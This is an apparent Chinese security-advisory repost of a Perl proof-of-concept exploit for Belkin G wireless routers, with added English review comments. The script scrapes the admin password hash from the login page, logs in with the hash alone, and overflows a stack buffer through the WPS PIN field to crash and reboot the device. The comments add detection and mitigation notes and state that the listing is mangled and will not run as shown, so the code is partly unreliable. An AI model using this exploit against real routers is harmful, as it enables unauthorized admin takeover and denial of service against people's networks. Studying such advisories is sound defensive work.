链接:http://packetstormsecurity.com/files/122956/belking-exec.txt *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl
# Belkin G wireless router PoC (authentication bypass + memory-corruption trigger),
# as published in the advisory linked above.  Read top-down: Welcome() -> Authenticate()
# -> Exploit().  All three subs share the file-scoped variables declared below; nothing
# is passed as an argument.
#
# What the script does, as visible in the code:
#   1. GET /login.stm and scrape the admin password hash out of a `var password = "..."`
#      JavaScript assignment embedded in the page (information disclosure).
#   2. POST that hash unchanged as the "pws" field to /cgi-bin/login.exe and treat a
#      response body containing "index" as a successful admin login (the hash alone is
#      sufficient; no cleartext password is needed).
#   3. POST an overlong "wpa_key_pass" to /cgi-bin/wireless_WPA.exe, then an overlong
#      "pin" to /cgi-bin/wireless_WPS_Enroll.exe to overwrite the saved return address.
#      Per the author's own comments the address is fixed per device/firmware and the
#      payload only crashes and reboots the device (denial of service, no shell).
#
# NOTE(review): this listing appears to have been mangled in extraction (byte-escape and
# newline sequences, string quoting); it will not parse as shown.  Treat it as
# illustrative of the attack flow rather than as a runnable script.
#
# Defensive takeaways grounded in the requests above:
#   - Detection: a GET to /login.stm followed by POSTs to /cgi-bin/login.exe,
#     /cgi-bin/wireless_WPA.exe and /cgi-bin/wireless_WPS_Enroll.exe carrying overlong
#     "wpa_key_pass"/"pin" values, from a host that is not the usual administrator, is a
#     clear indicator of this activity.  An unexpected reboot of the device right after
#     such requests is the visible effect of this PoC's payload.
#   - Mitigation: the advisory records no vendor patch.  Keep the management interface
#     unreachable from untrusted networks (no WAN/remote administration, LAN-only or
#     host allow-listing) and retire end-of-life units.
use strict;
use warnings;
use LWP 5.64;                  # minimum LWP version for the UserAgent API used below
$| = 1;                        # unbuffered STDOUT so progress lines appear immediately

# Variable declarations.
# File-scoped globals shared by Welcome(), Authenticate() and Exploit().
my $browser = LWP::UserAgent->new;
my $passHash="";               # admin password hash scraped from /login.stm
my $url ="";                   # URL of the current request
my $response ="";              # last response object returned by $browser->get/post
my $ip="";                     # target address taken verbatim from $ARGV[0]; never validated
$browser ->timeout(10);        # seconds; a dead or rebooting target fails fast

# Just a few nops followed by a dummy shellcode that crashes & reboots the router.
# (Per the author: the PoC payload is a crash/reboot only.  Exploit() requires it to fit
# in 120 bytes and pads it with the same filler value up to that size.)
my $shellcode="x20x20x20x20x20x20x20x20x20x20x20x20x04xd0xffxffx20x20x20x20";

# Authenticate: scrape the admin hash from the login page, log in with it, then prompt
# on STDIN before calling Exploit().  Exits the process on any failure.
# NOTE(review): the trailing `()` on the sub is a Perl prototype, not an argument
# signature; it only affects parsing and is not needed.
sub Authenticate() {
    print "[+] Trying to authenticate.
";
    # The login page embeds the stored admin password hash in its JavaScript.
    $url= "http://$ip/login.stm";
    $response = $browser->get( $url);
    # Greedy (.*): the capture runs to the last `";` on the matching line.
    my @aod= $response->content =~ m/var password = "(.*)";/g;
    if(!$aod[0]) {
        print "[-] Damn! Something went wrong. This might not work here :-/
";
        exit;
    } else {
        $passHash=$aod[0];
        print "[+] Admin Password = $passHash (MD5 Hash).
";
    }
    print "[+] Time to authenticate you!
";
    # The hash is submitted as-is; the login handler accepts it in place of the password.
    # "totalMSec" is a hard-coded form field — presumably a client-side timestamp the real
    # login form sends; verify against the page before relying on its meaning.
    $url = "http://$ip/cgi-bin/login.exe";
    $response = $browser->post( $url, [ "totalMSec" => "1377121454.99", "pws" => "$passHash", ,] );
    # Success is inferred solely from the substring "index" appearing in the body;
    # the HTTP status is never checked.
    if( $response->content =~ /index/ ) {
        print "[+] Logged in successfully as "Admin"!
";
        print "[!] Open this link in a browser for admin access : http://$ip/setup.htm
";
    } else {
        print "[-] Login failed! This might not work here :-/
";
        exit;
    }
    print "
[+] Continue with exploitation? (Y/N) : ";
    my $temp=<STDIN>;
    # `=~ "Y"` uses the string as a regex, so any answer containing a Y/y anywhere
    # (e.g. "yes", but also "nay") proceeds; everything else exits.
    if ($temp=~"Y" || $temp=~"y") {
        Exploit();
    } else {
        print "[+] Have fun!
";
        exit;
    }
}

# Exploit: two POSTs against the already-authenticated session.  Stage 1 plants the
# padded $shellcode through the WPA settings handler; Stage 2 overflows a stack buffer in
# the WPS enrollment handler so the saved return address points at Stage 1's buffer.
# Only a non-empty response body is checked after each POST — HTTP status is never
# inspected — so the "seems to have gone well" / "Done!" messages confirm nothing.
sub Exploit() {
    # Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
    # 0x803c0278 is fixed for this device/firmware combination.
    print "[+] Stage 1 : Allocating shellcode.
";
    if (length($shellcode) > 120) {
        print "[-] Shellcode is too big! (120 bytes Max)
";
        exit;
    }
    print "[+] Shellcode length : ".length($shellcode)."
";
    # Fill the rest with nops. Not needed but good to have.
    # Shellcode size should be ideally a multiple of 4 as this is MIPS.
    my $nopsize=120-length($shellcode);
    $shellcode=$shellcode.("x20"x$nopsize);
    # The padded buffer is submitted as the WPA passphrase ("wpa_key_pass"); the other
    # fields are ordinary form values so the handler accepts the submission.
    $url = "http://$ip/cgi-bin/wireless_WPA.exe";
    $response = $browser->post( $url, [
        "wpa_authen" => "1",
        "wpa_psk" => "0",
        "s_rekeysec" => "900000",
        "s_rekeypkt" => "1000",
        "w802_rekey" => "0",
        "encryption" => "3",
        "security_type" => "4",
        "authentication" => "3",
        "encryption_hid" => "3",
        "wpa_key_text" => "ssss",
        "wpa_key_pass" => "$shellcode",
        "obscure_psk" => "1",
        "sharedkey_alter" => "",
        "sharedkey_alter1" => "1",
        ,] );
    if( !$response->content ) {
        print "[-] Damn! Something went wrong. This might not work here :-/
";
    } else {
        print "[+] Stage 1 seems to have gone well.
";
    }
    # Stage 2: Trigger Stack Overflow & overwrite RA
    print "[+] Stage 2 : Triggering Return Address overwrite.
";
    # Overflow layout as named by the author: 32 bytes of filler, two 4-byte values for
    # the saved s0/s1 slots, the return address, then 4 filler bytes.
    my $junk="A"x32;
    my $s0="BBBB";
    my $s1="CCCC";
    my $ra="x78x02x3cx80"; #EPC -> 0x803c0278 Fixed for this device/firmware combination.
    my $nop="x20x20x20x20";
    my $payload=$junk.$s0.$s1.$ra.$nop;
    # The overlong "pin" value is what overflows the stack buffer in this handler.
    $url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
    $response = $browser->post( $url,[ "pin" => "$payload"]);
    if( !$response->content ) {
        print "[-] Damn! Something went wrong. This might not work here :-/
";
    } else {
        print "[-] Done! \m/
";
    }
}

# Welcome: print the banner and usage, copy the first command-line argument into the
# file-scoped $ip (no validation — it is interpolated into URLs verbatim), and exit if
# no argument was given.
sub Welcome() {
    print "
+------------------------------------------+
";
    print "| Belkin G Wireless Router Remote Exploit |
";
    print "| (Authentication bypass & RCE PoC) |
";
    print "+------------------------------------------+
";
    print "[+] By Aodrulez.
";
    print "
[+] Usage : perl $0 router_ip";
    print "
[!] Example : perl $0 X.X.X.X";
    if (!$ARGV[0]) {
        print "
[-] (o_0) Seriously??
";
        exit;
    }
    $ip=$ARGV[0];
    print "
[+] Target IP : $ip
";
}

# Burn!!
# Entry point: banner + argument handling, then the scrape/login flow, which prompts
# before anything destructive is sent.
Welcome();
Authenticate();
# End of exploit code.

建议: -------------------------------------------------------------------------------- 厂商补丁:Belkin ------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.belkin.com/us/support-article?rnId=306